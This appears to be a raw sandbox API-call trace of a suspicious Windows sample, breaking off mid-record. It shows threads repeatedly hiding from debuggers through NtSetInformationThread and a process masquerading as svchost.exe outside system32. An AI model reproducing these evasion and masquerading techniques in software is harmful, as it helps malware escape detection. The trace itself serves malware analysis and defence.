[0235.343] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0xc, wMilliseconds=0x308)) [0235.343] GetTickCount () returned 0x117b5c6 [0235.343] Sleep (dwMilliseconds=0x3e8) [0236.356] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0xd, wMilliseconds=0x315)) [0236.356] GetTickCount () returned 0x117b9ae [0236.356] Sleep (dwMilliseconds=0x3e8) [0237.391] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0xe, wMilliseconds=0x338)) [0237.391] GetTickCount () returned 0x117bdc5 [0237.391] Sleep (dwMilliseconds=0x3e8) [0238.402] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0xf, wMilliseconds=0x343)) [0238.403] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0238.404] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0238.404] GetCurrentThread () returned 0xfffffffe [0238.404] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0238.405] GetTickCount () returned 0x117c1ad [0238.405] Sleep (dwMilliseconds=0x3e8) [0239.423] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x10, wMilliseconds=0x353)) [0239.424] GetTickCount () returned 0x117c5a4 [0239.424] Sleep (dwMilliseconds=0x3e8) [0240.434] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x11, wMilliseconds=0x363)) [0240.435] GetTickCount () returned 0x117c99c [0240.435] Sleep (dwMilliseconds=0x3e8) [0241.438] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x12, wMilliseconds=0x367)) [0241.438] GetTickCount () returned 0x117cd93 [0241.438] Sleep (dwMilliseconds=0x3e8) [0242.652] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x14, wMilliseconds=0x53)) [0242.652] GetTickCount () returned 0x117d247 [0242.652] Sleep (dwMilliseconds=0x3e8) [0243.662] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x15, wMilliseconds=0x5f)) [0243.662] GetTickCount () returned 0x117d63e [0243.662] Sleep (dwMilliseconds=0x3e8) [0244.678] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x6e)) [0244.679] GetTickCount () returned 0x117da36 [0244.679] Sleep (dwMilliseconds=0x3e8) [0245.694] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x7e)) [0245.694] GetTickCount () returned 0x117de2d [0245.694] Sleep (dwMilliseconds=0x3e8) [0246.695] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x80)) [0246.695] GetTickCount () returned 0x117e215 [0246.696] Sleep (dwMilliseconds=0x3e8) [0247.711] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x19, wMilliseconds=0x90)) [0247.711] GetTickCount () returned 0x117e60d [0247.711] Sleep (dwMilliseconds=0x3e8) [0248.727] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x1a, wMilliseconds=0x9f)) [0248.728] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0248.729] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0248.729] GetCurrentThread () returned 0xfffffffe [0248.729] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0248.729] GetTickCount () returned 0x117ea05 [0248.729] Sleep (dwMilliseconds=0x3e8) [0249.744] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x1b, wMilliseconds=0xaf)) [0249.744] GetTickCount () returned 0x117edfc [0249.744] Sleep (dwMilliseconds=0x3e8) [0250.758] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x1c, wMilliseconds=0xbe)) [0250.758] GetTickCount () returned 0x117f1f4 [0250.758] Sleep (dwMilliseconds=0x3e8) [0251.766] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x1d, wMilliseconds=0xc6)) [0251.766] GetTickCount () returned 0x117f5ec [0251.766] Sleep (dwMilliseconds=0x3e8) [0252.782] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x1e, wMilliseconds=0xd7)) [0252.782] GetTickCount () returned 0x117f9e3 [0252.782] Sleep (dwMilliseconds=0x3e8) [0253.791] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x1f, wMilliseconds=0xe0)) [0253.791] GetTickCount () returned 0x117fdcb [0253.791] Sleep (dwMilliseconds=0x3e8) [0254.807] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x20, wMilliseconds=0xef)) [0254.807] GetTickCount () returned 0x11801c3 [0254.807] Sleep (dwMilliseconds=0x3e8) [0255.823] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x21, wMilliseconds=0xff)) [0255.823] GetTickCount () returned 0x11805ba [0255.823] Sleep (dwMilliseconds=0x3e8) [0256.823] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x22, wMilliseconds=0x100)) [0256.823] GetTickCount () returned 0x11809a2 [0256.823] Sleep (dwMilliseconds=0x3e8) [0257.841] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x23, wMilliseconds=0x111)) [0257.841] GetTickCount () returned 0x1180d9a [0257.841] Sleep (dwMilliseconds=0x3e8) [0258.872] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x24, wMilliseconds=0x12f)) [0258.873] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0258.873] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0258.873] GetCurrentThread () returned 0xfffffffe [0258.873] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0258.873] GetTickCount () returned 0x11811a1 [0258.873] Sleep (dwMilliseconds=0x3e8) [0259.904] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x25, wMilliseconds=0x14e)) [0259.904] GetTickCount () returned 0x11815a9 [0259.904] Sleep (dwMilliseconds=0x3e8) [0260.967] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x26, wMilliseconds=0x18e)) [0260.967] GetTickCount () returned 0x11819cf [0260.967] Sleep (dwMilliseconds=0x3e8) [0262.000] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x27, wMilliseconds=0x1b1)) [0262.000] GetTickCount () returned 0x1181de6 [0262.000] Sleep (dwMilliseconds=0x3e8) [0263.002] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x28, wMilliseconds=0x1b3)) [0263.002] GetTickCount () returned 0x11821ce [0263.002] Sleep (dwMilliseconds=0x3e8) [0264.049] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x29, wMilliseconds=0x1e2)) [0264.049] GetTickCount () returned 0x11825e5 [0264.049] Sleep (dwMilliseconds=0x3e8) [0265.091] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x2a, wMilliseconds=0x201)) [0265.091] GetTickCount () returned 0x11829ec [0265.091] Sleep (dwMilliseconds=0x3e8) [0266.127] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x2b, wMilliseconds=0x230)) [0266.127] GetTickCount () returned 0x1182e03 [0266.127] Sleep (dwMilliseconds=0x3e8) [0267.157] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x2c, wMilliseconds=0x241)) [0267.157] GetTickCount () returned 0x11831fb [0267.157] Sleep (dwMilliseconds=0x3e8) [0268.162] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x2d, wMilliseconds=0x252)) [0268.162] GetTickCount () returned 0x11835f2 [0268.162] Sleep (dwMilliseconds=0x3e8) [0269.224] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x2e, wMilliseconds=0x28f)) [0269.224] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0269.225] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0269.225] GetCurrentThread () returned 0xfffffffe [0269.225] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0269.225] GetTickCount () returned 0x1183a19 [0269.225] Sleep (dwMilliseconds=0x3e8) [0270.287] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x2f, wMilliseconds=0x2cf)) [0270.287] GetTickCount () returned 0x1183e3f [0270.287] Sleep (dwMilliseconds=0x3e8) [0271.302] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x30, wMilliseconds=0x2de)) [0271.302] GetTickCount () returned 0x1184237 [0271.302] Sleep (dwMilliseconds=0x3e8) [0272.362] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x31, wMilliseconds=0x319)) [0272.362] GetTickCount () returned 0x118465d [0272.362] Sleep (dwMilliseconds=0x3e8) [0273.384] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x32, wMilliseconds=0x330)) [0273.384] GetTickCount () returned 0x1184a55 [0273.384] Sleep (dwMilliseconds=0x3e8) [0274.431] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x33, wMilliseconds=0x35f)) [0274.431] GetTickCount () returned 0x1184e6c [0274.431] Sleep (dwMilliseconds=0x3e8) [0275.447] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x34, wMilliseconds=0x36f)) [0275.447] GetTickCount () returned 0x1185263 [0275.447] Sleep (dwMilliseconds=0x3e8) Thread: id = 5 os_tid = 0x804 [0057.236] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0057.236] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0057.236] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0057.236] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Thread: id = 6 os_tid = 0x5c8 [0057.451] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0057.451] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0057.451] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0057.451] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] ResetEvent (hEvent=0x200) returned 1 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] ResetEvent (hEvent=0x200) returned 1 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] SetEvent (hEvent=0x20c) returned 1 [0057.453] SetEvent (hEvent=0x200) returned 1 [0057.453] CloseHandle (hObject=0x34c) returned 1 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] ResetEvent (hEvent=0x200) returned 1 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] ResetEvent (hEvent=0x200) returned 1 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.453] GetCurrentThreadId () returned 0x5c8 [0057.454] SetEvent (hEvent=0x20c) returned 1 [0057.454] SetEvent (hEvent=0x200) returned 1 [0057.454] CloseHandle (hObject=0x34c) returned 1 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] ResetEvent (hEvent=0x200) returned 1 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] ResetEvent (hEvent=0x200) returned 1 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] SetEvent (hEvent=0x20c) returned 1 [0057.454] SetEvent (hEvent=0x200) returned 1 [0057.454] CloseHandle (hObject=0x350) returned 1 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] ResetEvent (hEvent=0x200) returned 1 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] ResetEvent (hEvent=0x200) returned 1 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] GetCurrentThreadId () returned 0x5c8 [0057.454] SetEvent (hEvent=0x20c) returned 1 [0057.454] SetEvent (hEvent=0x200) returned 1 [0057.454] CloseHandle (hObject=0x34c) returned 1 [0057.455] GetCurrentThreadId () returned 0x5c8 [0057.455] ResetEvent (hEvent=0x200) returned 1 [0057.455] GetCurrentThreadId () returned 0x5c8 [0057.455] GetCurrentThreadId () returned 0x5c8 [0057.455] GetCurrentThreadId () returned 0x5c8 [0057.455] GetCurrentThreadId () returned 0x5c8 [0057.455] ResetEvent (hEvent=0x200) returned 1 [0057.455] GetCurrentThreadId () returned 0x5c8 [0057.455] GetCurrentThreadId () returned 0x5c8 [0057.455] SetEvent (hEvent=0x20c) returned 1 [0057.455] SetEvent (hEvent=0x200) returned 1 [0057.455] CloseHandle (hObject=0x34c) returned 1 [0059.194] GetProcAddress (hModule=0x753c0000, lpProcName="CoGetContextToken") returned 0x74a48c20 [0059.194] CoGetContextToken (in: pToken=0x590f9d4 | out: pToken=0x590f9d4) returned 0x800401f0 [0059.194] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0059.195] RoInitialize () returned 0x1 [0059.195] RoUninitialize () returned 0x0 Thread: id = 7 os_tid = 0xee0 [0067.551] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0067.552] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0067.552] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0067.552] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Thread: id = 8 os_tid = 0xfa0 [0071.136] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0071.136] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0071.137] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0071.137] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Thread: id = 9 os_tid = 0xf14 [0072.241] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0072.242] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0072.242] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0072.242] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Thread: id = 10 os_tid = 0xd7c [0072.840] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0072.840] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0072.840] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0072.840] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0072.841] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0072.841] RoInitialize () returned 0x1 [0072.841] RoUninitialize () returned 0x0 [0072.846] GetProcAddress (hModule=0x772d0000, lpProcName="ResetEvent") returned 0x7733ec40 [0072.846] ResetEvent (hEvent=0x420) returned 1 [0187.892] QueryContextAttributesW (in: phContext=0x376c308, ulAttribute=0x1a, pBuffer=0x79ef528 | out: pBuffer=0x79ef528) returned 0x0 [0187.918] DeleteSecurityContext (phContext=0x376c308) returned 0x0 [0187.920] GetProcAddress (hModule=0x754f0000, lpProcName="shutdown") returned 0x755038a0 [0187.920] shutdown (s=0x5d4, how=2) returned 0 [0187.923] setsockopt (s=0x5d4, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0187.923] closesocket (s=0x5d4) returned 0 [0217.940] GetProcAddress (hModule=0x753c0000, lpProcName="CoUninitialize") returned 0x74a222b0 [0217.941] CoUninitialize () [0217.949] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Thread: id = 11 os_tid = 0xde0 [0079.901] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0079.901] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0079.902] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0079.902] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Thread: id = 12 os_tid = 0x85c [0080.179] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0080.181] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0080.182] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0080.182] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Thread: id = 13 os_tid = 0xe08 [0080.183] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0080.184] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0080.184] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0080.184] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Thread: id = 14 os_tid = 0xeb0 [0087.239] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0087.242] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0087.243] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0087.243] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Thread: id = 15 os_tid = 0xf90 [0089.590] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0089.590] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0089.591] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0089.591] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Thread: id = 16 os_tid = 0xfb0 [0089.662] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0089.663] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0089.663] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0089.664] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0123.403] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27d000" os_pid = "0x5b0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f8bc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 17 os_tid = 0x9bc Thread: id = 18 os_tid = 0x7ec Thread: id = 19 os_tid = 0x770 Thread: id = 20 os_tid = 0x7d8 Thread: id = 21 os_tid = 0x698 Thread: id = 22 os_tid = 0x690 Thread: id = 23 os_tid = 0x5fc Thread: id = 24 os_tid = 0x5f8 Thread: id = 25 os_tid = 0x5f4 Thread: id = 26 os_tid = 0x5b4 Thread: id = 232 os_tid = 0x664 Thread: id = 233 os_tid = 0x11b0 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\svchost.exe" page_root = "0x1ffcc000" os_pid = "0x1344" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13d8" cmd_line = "\"C:\\WINDOWS\\svchost.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 27 os_tid = 0x1358 [0098.703] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0098.705] SetThreadLocale (Locale=0x400) returned 1 [0098.705] GetVersion () returned 0x3ad7000a [0098.705] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0098.705] GetProcAddress (hModule=0x772d0000, lpProcName="GetThreadPreferredUILanguages") returned 0x772e7250 [0098.705] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0098.706] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadPreferredUILanguages") returned 0x772e4f10 [0098.706] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0098.706] GetProcAddress (hModule=0x772d0000, lpProcName="GetThreadUILanguage") returned 0x772e7290 [0098.706] GetSystemInfo (in: lpSystemInfo=0x19fcfc | out: lpSystemInfo=0x19fcfc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0098.706] GetCommandLineW () returned="\"C:\\WINDOWS\\svchost.exe\" " [0098.706] GetStartupInfoW (in: lpStartupInfo=0x19fcd8 | out: lpStartupInfo=0x19fcd8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\svchost.exe", dwX=0x0, 